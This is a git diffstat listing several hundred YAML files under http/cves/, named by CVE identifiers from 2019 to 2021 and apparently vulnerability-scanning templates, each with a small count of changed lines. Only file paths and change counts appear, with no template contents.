http/cves/2019/CVE-2019-0193.yaml | 3 +- http/cves/2019/CVE-2019-0221.yaml | 3 +- http/cves/2019/CVE-2019-10068.yaml | 3 +- http/cves/2019/CVE-2019-10092.yaml | 3 +- http/cves/2019/CVE-2019-10098.yaml | 3 +- http/cves/2019/CVE-2019-1010287.yaml | 3 +- http/cves/2019/CVE-2019-1010290.yaml | 3 +- http/cves/2019/CVE-2019-10232.yaml | 3 +- http/cves/2019/CVE-2019-10405.yaml | 3 +- http/cves/2019/CVE-2019-10475.yaml | 3 +- http/cves/2019/CVE-2019-10692.yaml | 3 +- http/cves/2019/CVE-2019-10758.yaml | 3 +- http/cves/2019/CVE-2019-11013.yaml | 3 +- http/cves/2019/CVE-2019-11248.yaml | 5 +- http/cves/2019/CVE-2019-11510.yaml | 3 +- http/cves/2019/CVE-2019-11581.yaml | 3 +- http/cves/2019/CVE-2019-11869.yaml | 3 +- http/cves/2019/CVE-2019-12276.yaml | 3 +- http/cves/2019/CVE-2019-12314.yaml | 3 +- http/cves/2019/CVE-2019-12461.yaml | 3 +- http/cves/2019/CVE-2019-12583.yaml | 3 +- http/cves/2019/CVE-2019-12593.yaml | 3 +- http/cves/2019/CVE-2019-12616.yaml | 3 +- http/cves/2019/CVE-2019-12725.yaml | 3 +- http/cves/2019/CVE-2019-12962.yaml | 3 +- http/cves/2019/CVE-2019-12985.yaml | 3 +- http/cves/2019/CVE-2019-12986.yaml | 3 +- http/cves/2019/CVE-2019-12987.yaml | 3 +- http/cves/2019/CVE-2019-12988.yaml | 3 +- http/cves/2019/CVE-2019-12990.yaml | 3 +- http/cves/2019/CVE-2019-13101.yaml | 3 +- http/cves/2019/CVE-2019-13392.yaml | 3 +- http/cves/2019/CVE-2019-13396.yaml | 3 +- http/cves/2019/CVE-2019-13462.yaml | 3 +- http/cves/2019/CVE-2019-14205.yaml | 3 +- http/cves/2019/CVE-2019-14223.yaml | 3 +- http/cves/2019/CVE-2019-14251.yaml | 3 +- http/cves/2019/CVE-2019-14312.yaml | 3 +- http/cves/2019/CVE-2019-14322.yaml | 3 +- http/cves/2019/CVE-2019-14470.yaml | 3 +- http/cves/2019/CVE-2019-14530.yaml | 3 +- http/cves/2019/CVE-2019-14696.yaml | 3 +- http/cves/2019/CVE-2019-14750.yaml | 3 +- http/cves/2019/CVE-2019-14789.yaml | 3 +- http/cves/2019/CVE-2019-14974.yaml | 3 +- http/cves/2019/CVE-2019-15043.yaml | 3 +- http/cves/2019/CVE-2019-15501.yaml | 3 +- http/cves/2019/CVE-2019-15713.yaml | 3 +- http/cves/2019/CVE-2019-15811.yaml | 3 +- http/cves/2019/CVE-2019-15829.yaml | 3 +- http/cves/2019/CVE-2019-15858.yaml | 3 +- http/cves/2019/CVE-2019-15859.yaml | 3 +- http/cves/2019/CVE-2019-15889.yaml | 3 +- http/cves/2019/CVE-2019-16097.yaml | 3 +- http/cves/2019/CVE-2019-16123.yaml | 3 +- http/cves/2019/CVE-2019-16278.yaml | 3 +- http/cves/2019/CVE-2019-16313.yaml | 3 +- http/cves/2019/CVE-2019-16332.yaml | 3 +- http/cves/2019/CVE-2019-16525.yaml | 3 +- http/cves/2019/CVE-2019-16931.yaml | 3 +- http/cves/2019/CVE-2019-16932.yaml | 3 +- http/cves/2019/CVE-2019-16996.yaml | 3 +- http/cves/2019/CVE-2019-16997.yaml | 3 +- http/cves/2019/CVE-2019-17382.yaml | 3 +- http/cves/2019/CVE-2019-17444.yaml | 3 +- http/cves/2019/CVE-2019-17503.yaml | 3 +- http/cves/2019/CVE-2019-17506.yaml | 3 +- http/cves/2019/CVE-2019-17538.yaml | 3 +- http/cves/2019/CVE-2019-17574.yaml | 3 +- http/cves/2019/CVE-2019-1821.yaml | 3 +- http/cves/2019/CVE-2019-18371.yaml | 3 +- http/cves/2019/CVE-2019-18393.yaml | 3 +- http/cves/2019/CVE-2019-18394.yaml | 3 +- http/cves/2019/CVE-2019-18665.yaml | 3 +- http/cves/2019/CVE-2019-18922.yaml | 3 +- http/cves/2019/CVE-2019-18957.yaml | 3 +- http/cves/2019/CVE-2019-1898.yaml | 3 +- http/cves/2019/CVE-2019-19134.yaml | 3 +- http/cves/2019/CVE-2019-19368.yaml | 3 +- http/cves/2019/CVE-2019-1943.yaml | 3 +- http/cves/2019/CVE-2019-19824.yaml | 3 +- http/cves/2019/CVE-2019-19908.yaml | 3 +- http/cves/2019/CVE-2019-19985.yaml | 3 +- http/cves/2019/CVE-2019-20085.yaml | 3 +- http/cves/2019/CVE-2019-20141.yaml | 3 +- http/cves/2019/CVE-2019-20183.yaml | 3 +- http/cves/2019/CVE-2019-20210.yaml | 3 +- http/cves/2019/CVE-2019-20224.yaml | 3 +- http/cves/2019/CVE-2019-20933.yaml | 3 +- http/cves/2019/CVE-2019-2578.yaml | 3 +- http/cves/2019/CVE-2019-2579.yaml | 3 +- http/cves/2019/CVE-2019-2588.yaml | 3 +- http/cves/2019/CVE-2019-2616.yaml | 3 +- http/cves/2019/CVE-2019-2767.yaml | 3 +- http/cves/2019/CVE-2019-3398.yaml | 3 +- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 3 +- http/cves/2019/CVE-2019-3403.yaml | 3 +- http/cves/2019/CVE-2019-3799.yaml | 3 +- http/cves/2019/CVE-2019-3911.yaml | 3 +- http/cves/2019/CVE-2019-3912.yaml | 3 +- http/cves/2019/CVE-2019-3929.yaml | 5 +- http/cves/2019/CVE-2019-5127.yaml | 3 +- http/cves/2019/CVE-2019-5418.yaml | 3 +- http/cves/2019/CVE-2019-5434.yaml | 3 +- http/cves/2019/CVE-2019-6112.yaml | 3 +- http/cves/2019/CVE-2019-6340.yaml | 3 +- http/cves/2019/CVE-2019-6715.yaml | 3 +- http/cves/2019/CVE-2019-6799.yaml | 3 +- http/cves/2019/CVE-2019-6802.yaml | 3 +- http/cves/2019/CVE-2019-7192.yaml | 3 +- http/cves/2019/CVE-2019-7219.yaml | 3 +- http/cves/2019/CVE-2019-7254.yaml | 3 +- http/cves/2019/CVE-2019-7255.yaml | 3 +- http/cves/2019/CVE-2019-7275.yaml | 3 +- http/cves/2019/CVE-2019-7315.yaml | 3 +- http/cves/2019/CVE-2019-7543.yaml | 3 +- http/cves/2019/CVE-2019-7609.yaml | 3 +- http/cves/2019/CVE-2019-8086.yaml | 3 +- http/cves/2019/CVE-2019-8390.yaml | 3 +- http/cves/2019/CVE-2019-8449.yaml | 3 +- http/cves/2019/CVE-2019-8451.yaml | 3 +- http/cves/2019/CVE-2019-8903.yaml | 3 +- http/cves/2019/CVE-2019-8937.yaml | 3 +- http/cves/2019/CVE-2019-9041.yaml | 3 +- http/cves/2019/CVE-2019-9618.yaml | 3 +- http/cves/2019/CVE-2019-9726.yaml | 3 +- http/cves/2019/CVE-2019-9915.yaml | 3 +- http/cves/2019/CVE-2019-9922.yaml | 3 +- http/cves/2019/CVE-2019-9955.yaml | 3 +- http/cves/2019/CVE-2019-9978.yaml | 3 +- http/cves/2020/CVE-2020-10220.yaml | 3 +- http/cves/2020/CVE-2020-10546.yaml | 3 +- http/cves/2020/CVE-2020-10547.yaml | 3 +- http/cves/2020/CVE-2020-10548.yaml | 3 +- http/cves/2020/CVE-2020-10549.yaml | 3 +- http/cves/2020/CVE-2020-10770.yaml | 3 +- http/cves/2020/CVE-2020-10973.yaml | 3 +- http/cves/2020/CVE-2020-11034.yaml | 5 +- http/cves/2020/CVE-2020-11110.yaml | 3 +- http/cves/2020/CVE-2020-11455.yaml | 3 +- http/cves/2020/CVE-2020-11529.yaml | 3 +- http/cves/2020/CVE-2020-11530.yaml | 3 +- http/cves/2020/CVE-2020-11546.yaml | 3 +- http/cves/2020/CVE-2020-11547.yaml | 3 +- http/cves/2020/CVE-2020-11710.yaml | 3 +- http/cves/2020/CVE-2020-11738.yaml | 3 +- http/cves/2020/CVE-2020-11853.yaml | 3 +- http/cves/2020/CVE-2020-11854.yaml | 3 +- http/cves/2020/CVE-2020-11930.yaml | 3 +- http/cves/2020/CVE-2020-11991.yaml | 3 +- http/cves/2020/CVE-2020-12054.yaml | 3 +- http/cves/2020/CVE-2020-12127.yaml | 3 +- http/cves/2020/CVE-2020-12256.yaml | 3 +- http/cves/2020/CVE-2020-12259.yaml | 3 +- http/cves/2020/CVE-2020-12447.yaml | 3 +- http/cves/2020/CVE-2020-12478.yaml | 3 +- http/cves/2020/CVE-2020-13117.yaml | 3 +- http/cves/2020/CVE-2020-13121.yaml | 3 +- http/cves/2020/CVE-2020-13158.yaml | 3 +- http/cves/2020/CVE-2020-13167.yaml | 3 +- http/cves/2020/CVE-2020-13258.yaml | 3 +- http/cves/2020/CVE-2020-13379.yaml | 3 +- http/cves/2020/CVE-2020-13405.yaml | 3 +- http/cves/2020/CVE-2020-13483.yaml | 3 +- http/cves/2020/CVE-2020-13638.yaml | 3 +- http/cves/2020/CVE-2020-13700.yaml | 3 +- http/cves/2020/CVE-2020-13820.yaml | 3 +- http/cves/2020/CVE-2020-13851.yaml | 3 +- http/cves/2020/CVE-2020-13937.yaml | 3 +- http/cves/2020/CVE-2020-13942.yaml | 5 +- http/cves/2020/CVE-2020-13945.yaml | 3 +- http/cves/2020/CVE-2020-14092.yaml | 3 +- http/cves/2020/CVE-2020-14144.yaml | 3 +- http/cves/2020/CVE-2020-14179.yaml | 3 +- http/cves/2020/CVE-2020-14181.yaml | 3 +- http/cves/2020/CVE-2020-14408.yaml | 3 +- http/cves/2020/CVE-2020-14413.yaml | 3 +- http/cves/2020/CVE-2020-14864.yaml | 3 +- http/cves/2020/CVE-2020-15050.yaml | 3 +- http/cves/2020/CVE-2020-15129.yaml | 3 +- http/cves/2020/CVE-2020-15148.yaml | 3 +- http/cves/2020/CVE-2020-15568.yaml | 3 +- http/cves/2020/CVE-2020-15867.yaml | 3 +- http/cves/2020/CVE-2020-15895.yaml | 3 +- http/cves/2020/CVE-2020-16139.yaml | 3 +- http/cves/2020/CVE-2020-16952.yaml | 3 +- http/cves/2020/CVE-2020-17362.yaml | 3 +- http/cves/2020/CVE-2020-17453.yaml | 3 +- http/cves/2020/CVE-2020-17456.yaml | 3 +- http/cves/2020/CVE-2020-17463.yaml | 3 +- http/cves/2020/CVE-2020-17496.yaml | 3 +- http/cves/2020/CVE-2020-17505.yaml | 3 +- http/cves/2020/CVE-2020-17506.yaml | 3 +- http/cves/2020/CVE-2020-17518.yaml | 5 +- http/cves/2020/CVE-2020-17526.yaml | 3 +- http/cves/2020/CVE-2020-17530.yaml | 3 +- http/cves/2020/CVE-2020-18268.yaml | 3 +- http/cves/2020/CVE-2020-19282.yaml | 3 +- http/cves/2020/CVE-2020-19283.yaml | 3 +- http/cves/2020/CVE-2020-19295.yaml | 3 +- http/cves/2020/CVE-2020-19360.yaml | 3 +- http/cves/2020/CVE-2020-19515.yaml | 3 +- http/cves/2020/CVE-2020-19625.yaml | 3 +- http/cves/2020/CVE-2020-20285.yaml | 3 +- http/cves/2020/CVE-2020-2036.yaml | 3 +- http/cves/2020/CVE-2020-2096.yaml | 3 +- http/cves/2020/CVE-2020-20982.yaml | 3 +- http/cves/2020/CVE-2020-20988.yaml | 3 +- http/cves/2020/CVE-2020-21012.yaml | 3 +- http/cves/2020/CVE-2020-2103.yaml | 3 +- http/cves/2020/CVE-2020-21224.yaml | 3 +- http/cves/2020/CVE-2020-2140.yaml | 3 +- http/cves/2020/CVE-2020-22208.yaml | 3 +- http/cves/2020/CVE-2020-22209.yaml | 3 +- http/cves/2020/CVE-2020-22210.yaml | 3 +- http/cves/2020/CVE-2020-22211.yaml | 3 +- http/cves/2020/CVE-2020-22840.yaml | 3 +- http/cves/2020/CVE-2020-23015.yaml | 3 +- http/cves/2020/CVE-2020-23517.yaml | 3 +- http/cves/2020/CVE-2020-23575.yaml | 3 +- http/cves/2020/CVE-2020-23697.yaml | 3 +- http/cves/2020/CVE-2020-24148.yaml | 3 +- http/cves/2020/CVE-2020-24312.yaml | 3 +- http/cves/2020/CVE-2020-24391.yaml | 3 +- http/cves/2020/CVE-2020-24550.yaml | 3 +- http/cves/2020/CVE-2020-24571.yaml | 3 +- http/cves/2020/CVE-2020-24589.yaml | 3 +- http/cves/2020/CVE-2020-24902.yaml | 3 +- http/cves/2020/CVE-2020-24903.yaml | 3 +- http/cves/2020/CVE-2020-24912.yaml | 3 +- http/cves/2020/CVE-2020-24949.yaml | 3 +- http/cves/2020/CVE-2020-25078.yaml | 3 +- http/cves/2020/CVE-2020-25213.yaml | 3 +- http/cves/2020/CVE-2020-25495.yaml | 3 +- http/cves/2020/CVE-2020-25506.yaml | 3 +- http/cves/2020/CVE-2020-2551.yaml | 3 +- http/cves/2020/CVE-2020-25540.yaml | 3 +- http/cves/2020/CVE-2020-25780.yaml | 3 +- http/cves/2020/CVE-2020-25864.yaml | 3 +- http/cves/2020/CVE-2020-26153.yaml | 3 +- http/cves/2020/CVE-2020-26214.yaml | 3 +- http/cves/2020/CVE-2020-26248.yaml | 3 +- http/cves/2020/CVE-2020-26413.yaml | 3 +- http/cves/2020/CVE-2020-26876.yaml | 3 +- http/cves/2020/CVE-2020-26919.yaml | 3 +- http/cves/2020/CVE-2020-26948.yaml | 3 +- http/cves/2020/CVE-2020-2733.yaml | 3 +- http/cves/2020/CVE-2020-27361.yaml | 3 +- http/cves/2020/CVE-2020-27467.yaml | 3 +- http/cves/2020/CVE-2020-27481.yaml | 3 +- http/cves/2020/CVE-2020-27735.yaml | 3 +- http/cves/2020/CVE-2020-27866.yaml | 3 +- http/cves/2020/CVE-2020-27982.yaml | 3 +- http/cves/2020/CVE-2020-27986.yaml | 3 +- http/cves/2020/CVE-2020-28185.yaml | 3 +- http/cves/2020/CVE-2020-28208.yaml | 3 +- http/cves/2020/CVE-2020-28351.yaml | 3 +- http/cves/2020/CVE-2020-28976.yaml | 3 +- http/cves/2020/CVE-2020-29164.yaml | 3 +- http/cves/2020/CVE-2020-29227.yaml | 3 +- http/cves/2020/CVE-2020-29284.yaml | 3 +- http/cves/2020/CVE-2020-29395.yaml | 3 +- http/cves/2020/CVE-2020-29453.yaml | 3 +- http/cves/2020/CVE-2020-3452.yaml | 3 +- http/cves/2020/CVE-2020-35234.yaml | 3 +- http/cves/2020/CVE-2020-35338.yaml | 3 +- http/cves/2020/CVE-2020-35476.yaml | 3 +- http/cves/2020/CVE-2020-35580.yaml | 3 +- http/cves/2020/CVE-2020-35598.yaml | 3 +- http/cves/2020/CVE-2020-35729.yaml | 3 +- http/cves/2020/CVE-2020-35736.yaml | 3 +- http/cves/2020/CVE-2020-35749.yaml | 3 +- http/cves/2020/CVE-2020-35846.yaml | 3 +- http/cves/2020/CVE-2020-35847.yaml | 3 +- http/cves/2020/CVE-2020-35848.yaml | 3 +- http/cves/2020/CVE-2020-35951.yaml | 3 +- http/cves/2020/CVE-2020-35984.yaml | 3 +- http/cves/2020/CVE-2020-35985.yaml | 3 +- http/cves/2020/CVE-2020-35986.yaml | 3 +- http/cves/2020/CVE-2020-35987.yaml | 3 +- http/cves/2020/CVE-2020-36112.yaml | 3 +- http/cves/2020/CVE-2020-36289.yaml | 3 +- http/cves/2020/CVE-2020-36365.yaml | 3 +- http/cves/2020/CVE-2020-36510.yaml | 3 +- http/cves/2020/CVE-2020-4463.yaml | 3 +- http/cves/2020/CVE-2020-5191.yaml | 3 +- http/cves/2020/CVE-2020-5192.yaml | 3 +- http/cves/2020/CVE-2020-5284.yaml | 3 +- http/cves/2020/CVE-2020-5307.yaml | 3 +- http/cves/2020/CVE-2020-5405.yaml | 5 +- http/cves/2020/CVE-2020-5410.yaml | 3 +- http/cves/2020/CVE-2020-5412.yaml | 4 +- http/cves/2020/CVE-2020-5775.yaml | 3 +- http/cves/2020/CVE-2020-5777.yaml | 3 +- http/cves/2020/CVE-2020-6171.yaml | 3 +- http/cves/2020/CVE-2020-6207.yaml | 3 +- http/cves/2020/CVE-2020-6308.yaml | 3 +- http/cves/2020/CVE-2020-6637.yaml | 3 +- http/cves/2020/CVE-2020-6950.yaml | 3 +- http/cves/2020/CVE-2020-7107.yaml | 3 +- http/cves/2020/CVE-2020-7136.yaml | 3 +- http/cves/2020/CVE-2020-7318.yaml | 3 +- http/cves/2020/CVE-2020-7796.yaml | 3 +- http/cves/2020/CVE-2020-7943.yaml | 3 +- http/cves/2020/CVE-2020-7961.yaml | 3 +- http/cves/2020/CVE-2020-7980.yaml | 3 +- http/cves/2020/CVE-2020-8115.yaml | 3 +- http/cves/2020/CVE-2020-8163.yaml | 3 +- http/cves/2020/CVE-2020-8497.yaml | 3 +- http/cves/2020/CVE-2020-8512.yaml | 3 +- http/cves/2020/CVE-2020-8615.yaml | 3 +- http/cves/2020/CVE-2020-8641.yaml | 3 +- http/cves/2020/CVE-2020-8644.yaml | 3 +- http/cves/2020/CVE-2020-8654.yaml | 3 +- http/cves/2020/CVE-2020-8771.yaml | 3 +- http/cves/2020/CVE-2020-8813.yaml | 3 +- http/cves/2020/CVE-2020-9036.yaml | 3 +- http/cves/2020/CVE-2020-9043.yaml | 3 +- http/cves/2020/CVE-2020-9047.yaml | 3 +- http/cves/2020/CVE-2020-9344.yaml | 3 +- http/cves/2020/CVE-2020-9402.yaml | 3 +- http/cves/2020/CVE-2020-9425.yaml | 3 +- http/cves/2020/CVE-2020-9483.yaml | 3 +- http/cves/2020/CVE-2020-9484.yaml | 3 +- http/cves/2021/CVE-2021-1497.yaml | 3 +- http/cves/2021/CVE-2021-1498.yaml | 3 +- http/cves/2021/CVE-2021-1499.yaml | 3 +- http/cves/2021/CVE-2021-20031.yaml | 3 +- http/cves/2021/CVE-2021-20091.yaml | 3 +- http/cves/2021/CVE-2021-20092.yaml | 3 +- http/cves/2021/CVE-2021-20114.yaml | 3 +- http/cves/2021/CVE-2021-20123.yaml | 3 +- http/cves/2021/CVE-2021-20124.yaml | 3 +- http/cves/2021/CVE-2021-20137.yaml | 3 +- http/cves/2021/CVE-2021-20150.yaml | 3 +- http/cves/2021/CVE-2021-20158.yaml | 3 +- http/cves/2021/CVE-2021-20792.yaml | 3 +- http/cves/2021/CVE-2021-21087.yaml | 3 +- http/cves/2021/CVE-2021-21234.yaml | 3 +- http/cves/2021/CVE-2021-21311.yaml | 3 +- http/cves/2021/CVE-2021-21315.yaml | 3 +- http/cves/2021/CVE-2021-21345.yaml | 3 +- http/cves/2021/CVE-2021-21389.yaml | 3 +- http/cves/2021/CVE-2021-21402.yaml | 3 +- http/cves/2021/CVE-2021-21479.yaml | 3 +- http/cves/2021/CVE-2021-21745.yaml | 3 +- http/cves/2021/CVE-2021-21799.yaml | 3 +- http/cves/2021/CVE-2021-21800.yaml | 3 +- http/cves/2021/CVE-2021-21801.yaml | 3 +- http/cves/2021/CVE-2021-21802.yaml | 3 +- http/cves/2021/CVE-2021-21803.yaml | 3 +- http/cves/2021/CVE-2021-21805.yaml | 3 +- http/cves/2021/CVE-2021-21816.yaml | 3 +- http/cves/2021/CVE-2021-21972.yaml | 3 +- http/cves/2021/CVE-2021-21973.yaml | 3 +- http/cves/2021/CVE-2021-21975.yaml | 3 +- http/cves/2021/CVE-2021-21978.yaml | 3 +- http/cves/2021/CVE-2021-22005.yaml | 3 +- http/cves/2021/CVE-2021-22053.yaml | 3 +- http/cves/2021/CVE-2021-22054.yaml | 3 +- http/cves/2021/CVE-2021-22122.yaml | 3 +- http/cves/2021/CVE-2021-22145.yaml | 3 +- http/cves/2021/CVE-2021-22214.yaml | 3 +- http/cves/2021/CVE-2021-22707.yaml | 3 +- http/cves/2021/CVE-2021-22873.yaml | 3 +- http/cves/2021/CVE-2021-22911.yaml | 3 +- http/cves/2021/CVE-2021-23241.yaml | 3 +- http/cves/2021/CVE-2021-24146.yaml | 3 +- http/cves/2021/CVE-2021-24150.yaml | 3 +- http/cves/2021/CVE-2021-24155.yaml | 3 +- http/cves/2021/CVE-2021-24165.yaml | 3 +- http/cves/2021/CVE-2021-24169.yaml | 3 +- http/cves/2021/CVE-2021-24176.yaml | 3 +- http/cves/2021/CVE-2021-24210.yaml | 3 +- http/cves/2021/CVE-2021-24214.yaml | 3 +- http/cves/2021/CVE-2021-24215.yaml | 3 +- http/cves/2021/CVE-2021-24226.yaml | 3 +- http/cves/2021/CVE-2021-24227.yaml | 3 +- http/cves/2021/CVE-2021-24235.yaml | 3 +- http/cves/2021/CVE-2021-24236.yaml | 3 +- http/cves/2021/CVE-2021-24237.yaml | 3 +- http/cves/2021/CVE-2021-24239.yaml | 3 +- http/cves/2021/CVE-2021-24245.yaml | 3 +- http/cves/2021/CVE-2021-24274.yaml | 3 +- http/cves/2021/CVE-2021-24275.yaml | 3 +- http/cves/2021/CVE-2021-24276.yaml | 3 +- http/cves/2021/CVE-2021-24278.yaml | 3 +- http/cves/2021/CVE-2021-24284.yaml | 3 +- http/cves/2021/CVE-2021-24285.yaml | 3 +- http/cves/2021/CVE-2021-24286.yaml | 3 +- http/cves/2021/CVE-2021-24287.yaml | 3 +- http/cves/2021/CVE-2021-24288.yaml | 3 +- http/cves/2021/CVE-2021-24291.yaml | 3 +- http/cves/2021/CVE-2021-24298.yaml | 3 +- http/cves/2021/CVE-2021-24300.yaml | 3 +- http/cves/2021/CVE-2021-24316.yaml | 3 +- http/cves/2021/CVE-2021-24320.yaml | 3 +- http/cves/2021/CVE-2021-24335.yaml | 3 +- http/cves/2021/CVE-2021-24340.yaml | 3 +- http/cves/2021/CVE-2021-24342.yaml | 3 +- http/cves/2021/CVE-2021-24347.yaml | 3 +- http/cves/2021/CVE-2021-24351.yaml | 3 +- http/cves/2021/CVE-2021-24358.yaml | 3 +- http/cves/2021/CVE-2021-24364.yaml | 3 +- http/cves/2021/CVE-2021-24370.yaml | 3 +- http/cves/2021/CVE-2021-24387.yaml | 3 +- http/cves/2021/CVE-2021-24389.yaml | 3 +- http/cves/2021/CVE-2021-24406.yaml | 3 +- http/cves/2021/CVE-2021-24407.yaml | 3 +- http/cves/2021/CVE-2021-24409.yaml | 3 +- http/cves/2021/CVE-2021-24435.yaml | 3 +- http/cves/2021/CVE-2021-24436.yaml | 3 +- http/cves/2021/CVE-2021-24452.yaml | 3 +- http/cves/2021/CVE-2021-24472.yaml | 3 +- http/cves/2021/CVE-2021-24488.yaml | 3 +- http/cves/2021/CVE-2021-24495.yaml | 3 +- http/cves/2021/CVE-2021-24498.yaml | 3 +- http/cves/2021/CVE-2021-24499.yaml | 3 +- http/cves/2021/CVE-2021-24510.yaml | 3 +- http/cves/2021/CVE-2021-24627.yaml | 3 +- http/cves/2021/CVE-2021-24647.yaml | 3 +- http/cves/2021/CVE-2021-24666.yaml | 3 +- http/cves/2021/CVE-2021-24746.yaml | 3 +- http/cves/2021/CVE-2021-24762.yaml | 3 +- http/cves/2021/CVE-2021-24791.yaml | 3 +- http/cves/2021/CVE-2021-24827.yaml | 3 +- http/cves/2021/CVE-2021-24838.yaml | 3 +- http/cves/2021/CVE-2021-24862.yaml | 3 +- http/cves/2021/CVE-2021-24875.yaml | 3 +- http/cves/2021/CVE-2021-24891.yaml | 3 +- http/cves/2021/CVE-2021-24910.yaml | 3 +- http/cves/2021/CVE-2021-24915.yaml | 3 +- http/cves/2021/CVE-2021-24917.yaml | 3 +- http/cves/2021/CVE-2021-24926.yaml | 3 +- http/cves/2021/CVE-2021-24940.yaml | 3 +- http/cves/2021/CVE-2021-24946.yaml | 3 +- http/cves/2021/CVE-2021-24956.yaml | 3 +- http/cves/2021/CVE-2021-24970.yaml | 3 +- http/cves/2021/CVE-2021-24979.yaml | 3 +- http/cves/2021/CVE-2021-24987.yaml | 3 +- http/cves/2021/CVE-2021-24997.yaml | 3 +- http/cves/2021/CVE-2021-25003.yaml | 3 +- http/cves/2021/CVE-2021-25008.yaml | 3 +- http/cves/2021/CVE-2021-25016.yaml | 3 +- http/cves/2021/CVE-2021-25028.yaml | 3 +- http/cves/2021/CVE-2021-25033.yaml | 3 +- http/cves/2021/CVE-2021-25052.yaml | 3 +- http/cves/2021/CVE-2021-25055.yaml | 3 +- http/cves/2021/CVE-2021-25063.yaml | 3 +- http/cves/2021/CVE-2021-25065.yaml | 3 +- http/cves/2021/CVE-2021-25067.yaml | 3 +- http/cves/2021/CVE-2021-25074.yaml | 3 +- http/cves/2021/CVE-2021-25075.yaml | 3 +- http/cves/2021/CVE-2021-25078.yaml | 3 +- http/cves/2021/CVE-2021-25079.yaml | 3 +- http/cves/2021/CVE-2021-25085.yaml | 3 +- http/cves/2021/CVE-2021-25099.yaml | 3 +- http/cves/2021/CVE-2021-25104.yaml | 3 +- http/cves/2021/CVE-2021-25111.yaml | 3 +- http/cves/2021/CVE-2021-25112.yaml | 3 +- http/cves/2021/CVE-2021-25114.yaml | 3 +- http/cves/2021/CVE-2021-25118.yaml | 3 +- http/cves/2021/CVE-2021-25120.yaml | 3 +- http/cves/2021/CVE-2021-25281.yaml | 3 +- http/cves/2021/CVE-2021-25299.yaml | 3 +- http/cves/2021/CVE-2021-25864.yaml | 3 +- http/cves/2021/CVE-2021-25899.yaml | 3 +- http/cves/2021/CVE-2021-26085.yaml | 3 +- http/cves/2021/CVE-2021-26086.yaml | 3 +- http/cves/2021/CVE-2021-26247.yaml | 3 +- http/cves/2021/CVE-2021-26295.yaml | 3 +- http/cves/2021/CVE-2021-26475.yaml | 3 +- http/cves/2021/CVE-2021-26598.yaml | 3 +- http/cves/2021/CVE-2021-26702.yaml | 3 +- http/cves/2021/CVE-2021-26710.yaml | 3 +- http/cves/2021/CVE-2021-26723.yaml | 3 +- http/cves/2021/CVE-2021-26855.yaml | 3 +- http/cves/2021/CVE-2021-27124.yaml | 3 +- http/cves/2021/CVE-2021-27132.yaml | 3 +- http/cves/2021/CVE-2021-27309.yaml | 3 +- http/cves/2021/CVE-2021-27310.yaml | 3 +- http/cves/2021/CVE-2021-27314.yaml | 3 +- http/cves/2021/CVE-2021-27315.yaml | 3 +- http/cves/2021/CVE-2021-27316.yaml | 3 +- http/cves/2021/CVE-2021-27319.yaml | 3 +- http/cves/2021/CVE-2021-27320.yaml | 3 +- http/cves/2021/CVE-2021-27330.yaml | 3 +- http/cves/2021/CVE-2021-27358.yaml | 3 +- http/cves/2021/CVE-2021-27519.yaml | 3 +- http/cves/2021/CVE-2021-27520.yaml | 3 +- http/cves/2021/CVE-2021-27651.yaml | 3 +- http/cves/2021/CVE-2021-27670.yaml | 3 +- http/cves/2021/CVE-2021-27909.yaml | 3 +- http/cves/2021/CVE-2021-27931.yaml | 3 +- http/cves/2021/CVE-2021-28149.yaml | 3 +- http/cves/2021/CVE-2021-28150.yaml | 3 +- http/cves/2021/CVE-2021-28151.yaml | 3 +- http/cves/2021/CVE-2021-28164.yaml | 3 +- http/cves/2021/CVE-2021-28169.yaml | 3 +- http/cves/2021/CVE-2021-28377.yaml | 3 +- http/cves/2021/CVE-2021-28918.yaml | 3 +- http/cves/2021/CVE-2021-28937.yaml | 3 +- http/cves/2021/CVE-2021-29006.yaml | 3 +- http/cves/2021/CVE-2021-29156.yaml | 3 +- http/cves/2021/CVE-2021-29203.yaml | 3 +- http/cves/2021/CVE-2021-29441.yaml | 3 +- http/cves/2021/CVE-2021-29442.yaml | 3 +- http/cves/2021/CVE-2021-29484.yaml | 3 +- http/cves/2021/CVE-2021-29490.yaml | 3 +- http/cves/2021/CVE-2021-29505.yaml | 3 +- http/cves/2021/CVE-2021-29622.yaml | 3 +- http/cves/2021/CVE-2021-3002.yaml | 3 +- http/cves/2021/CVE-2021-30049.yaml | 3 +- http/cves/2021/CVE-2021-30128.yaml | 3 +- http/cves/2021/CVE-2021-30134.yaml | 3 +- http/cves/2021/CVE-2021-30151.yaml | 3 +- http/cves/2021/CVE-2021-3017.yaml | 3 +- http/cves/2021/CVE-2021-30175.yaml | 3 +- http/cves/2021/CVE-2021-3019.yaml | 3 +- http/cves/2021/CVE-2021-30213.yaml | 3 +- http/cves/2021/CVE-2021-30497.yaml | 3 +- http/cves/2021/CVE-2021-31195.yaml | 3 +- http/cves/2021/CVE-2021-31537.yaml | 3 +- http/cves/2021/CVE-2021-31581.yaml | 5 +- http/cves/2021/CVE-2021-31589.yaml | 3 +- http/cves/2021/CVE-2021-31602.yaml | 3 +- http/cves/2021/CVE-2021-31755.yaml | 3 +- http/cves/2021/CVE-2021-31805.yaml | 3 +- http/cves/2021/CVE-2021-31856.yaml | 3 +- http/cves/2021/CVE-2021-31862.yaml | 3 +- http/cves/2021/CVE-2021-32030.yaml | 3 +- http/cves/2021/CVE-2021-32172.yaml | 3 +- http/cves/2021/CVE-2021-3223.yaml | 3 +- http/cves/2021/CVE-2021-32305.yaml | 3 +- http/cves/2021/CVE-2021-32618.yaml | 3 +- http/cves/2021/CVE-2021-32789.yaml | 3 +- http/cves/2021/CVE-2021-32820.yaml | 3 +- http/cves/2021/CVE-2021-3293.yaml | 3 +- http/cves/2021/CVE-2021-33044.yaml | 3 +- http/cves/2021/CVE-2021-33221.yaml | 3 +- http/cves/2021/CVE-2021-33357.yaml | 3 +- http/cves/2021/CVE-2021-33564.yaml | 3 +- http/cves/2021/CVE-2021-3374.yaml | 3 +- http/cves/2021/CVE-2021-3377.yaml | 3 +- http/cves/2021/CVE-2021-3378.yaml | 3 +- http/cves/2021/CVE-2021-33807.yaml | 3 +- http/cves/2021/CVE-2021-33851.yaml | 3 +- http/cves/2021/CVE-2021-33904.yaml | 3 +- http/cves/2021/CVE-2021-34370.yaml | 3 +- http/cves/2021/CVE-2021-34429.yaml | 3 +- http/cves/2021/CVE-2021-34473.yaml | 3 +- http/cves/2021/CVE-2021-34621.yaml | 5 +- http/cves/2021/CVE-2021-34640.yaml | 3 +- http/cves/2021/CVE-2021-34643.yaml | 3 +- 